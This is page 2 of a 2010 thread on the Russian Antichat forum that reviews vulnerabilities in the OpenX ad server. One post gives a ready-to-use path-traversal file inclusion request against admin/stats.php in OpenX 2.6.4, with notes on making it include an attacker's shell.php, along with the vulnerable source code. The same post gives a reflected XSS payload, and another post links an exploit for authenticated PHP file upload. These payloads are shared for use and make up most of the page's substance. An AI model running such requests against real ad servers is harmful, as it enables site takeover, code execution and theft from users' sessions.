ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу [ Обзор уязвимостей OpenX (phpAdsNew, Openads) ]
   
 
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 21.04.2010, 13:52
(Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131

Репутация: 1695
По умолчанию
Цитата:
Сообщение от MaSTeR GэN  
http://securityreason.com/wlb_show/WLB-2010010098
кто нить что нибудь понимает ? лично я нет, где там иньекция ,сижу втупляю не могу не хрена понять и вообше какое это отношение к самому движку имеет то ? ((
не имеет никакого отношения.
__________________
Cервер cs 1.6
cs.antichat.net:27015
 

  #12  
Старый 24.04.2010, 09:13
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
OpenX 2.6.4
LFI
Need: Права админа
/openx/www/admin/stats.php?entity=../../../../../../shell&breakdown=Обязательно пустое.
// shell, у меня там просто в папке с OpenX лежит файл shell.php, там <?PHP phpinfo(); ?> Код выполнился.
Если breakdown не вписать, то будет инклюдиться нечто вроде:
openx/lib/OA/Admin/Statistics/Delivery/Controller/../../../../../../shellAdvertiser.php

PHP код:
// Prepare the stats controller, and populate with the stats
$oStatsController = &OA_Admin_Statistics_Factory::getController($entity "-" $breakdown$aParams);
if (PEAR::isError($oStatsController)) {
    phpAds_Die('Error occured'$oStatsController->getMessage());
}
$oStatsController->start(); 
Ну вроде тот код, т.к. искал по началу в слепую.


Пассивная XSS:

openx/www/admin/stats.php?entity=campaign&breakdown=history&client id=1&campaignid=1'%22%3E%3Cscript%3Ealert();%3C/script%3E
Последний раз редактировалось Ctacok; 24.04.2010 в 09:21..
 

  #13  
Старый 11.05.2010, 21:01
gabarea
Новичок
Регистрация: 30.03.2010
Сообщений: 2
Провел на форуме:
21162

Репутация: 0
По умолчанию
http://downloads.securityfocus.com/vulnerabilities/exploits/37110.rb

Цитата:
Сообщение от (Dm)  
ну а что не прокомментировал сплоит !1111
Загрузка php файлов, для авторизованных пользователей.
Версия <= 2.8.2
Последний раз редактировалось Ctacok; 15.06.2010 в 07:35..
 
 
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ